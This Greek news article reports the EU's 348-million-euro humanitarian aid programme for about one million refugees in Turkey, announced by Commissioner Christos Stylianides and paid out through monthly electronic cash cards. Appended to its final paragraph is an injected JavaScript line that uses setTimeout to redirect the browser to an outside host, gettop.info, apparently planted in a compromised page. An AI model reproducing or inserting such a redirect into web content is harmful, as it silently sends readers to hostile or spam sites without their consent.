Ε.Ε.: Ανθρωπιστική βοήθεια για 1 εκατ. πρόσφυγες στην Τουρκία

0
10

 

Ανθρωπιστική βοήθεια ύψους 348 εκατ. ευρώ για τους πρόσφυγες στην Τουρκία, τη μεγαλύτερη που έχει δοθεί ποτέ από την Ευρωπαϊκή Ένωση, ανακοίνωσε ο επίτροπος Ανθρωπιστικής Βοήθειας και Πολιτικής Προστασίας, Χρήστος Στυλιανίδης, κατά τη διάρκεια συνέντευξης Τύπου που παραχώρησε στις Βρυξέλλες.

Όπως εξήγησε ο κ. Στυλιανίδης, πρόκειται για ένα «έκτακτο κοινωνικό δίχτυ ασφαλείας», που δημιουργείται για τους πρόσφυγες στην Τουρκία, στο πλαίσιο των δεσμεύσεων που έχει αναλάβει η Ε.Ε. με τη συμφωνία με την Άγκυρα και το οποίο θα χορηγήσει 348 εκατ. ευρώ από τον κοινοτικό προϋπολογισμό.

Πρόκειται για το μεγαλύτερο ανθρωπιστικό πρόγραμμα που έχει χρηματοδοτήσει ποτέ η Ε.Ε. και υπολογίζεται ότι θα καλύψει τις βασικές ανάγκες (στέγη, τροφή, σχολεία κτλ.) για περίπου ένα εκατομμύριο πρόσφυγες στη γειτονική χώρα.

Σύμφωνα με την ανακοίνωση της Ευρωπαϊκής Επιτροπής, η βοήθεια θα φτάσει στους πρόσφυγες μέσω ενός καινοτόμου συστήματος, το οποίο χρησιμοποιεί απευθείας ταμειακές μεταφορές για να καλύψει τις καθημερινές ανάγκες των πλέον ευάλωτων οικογενειών προσφύγων στην Τουρκία.

Οι πρόσφυγες θα λαμβάνουν ηλεκτρονική πιστωτική κάρτα στην οποία θα μπαίνουν κάθε μήνα χρήματα, για να αγοράζουν τα απαραίτητα.
Ο Χρήστος Στυλιανίδης υπογράμμισε ότι πρόκειται για τον πλέον αποτελεσματικό τρόπο βοήθειας, διότι μειώνονται οι ενδιάμεσες δαπάνες και μεγιστοποιείται η βοήθεια που φτάνει στους πρόσφυγες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here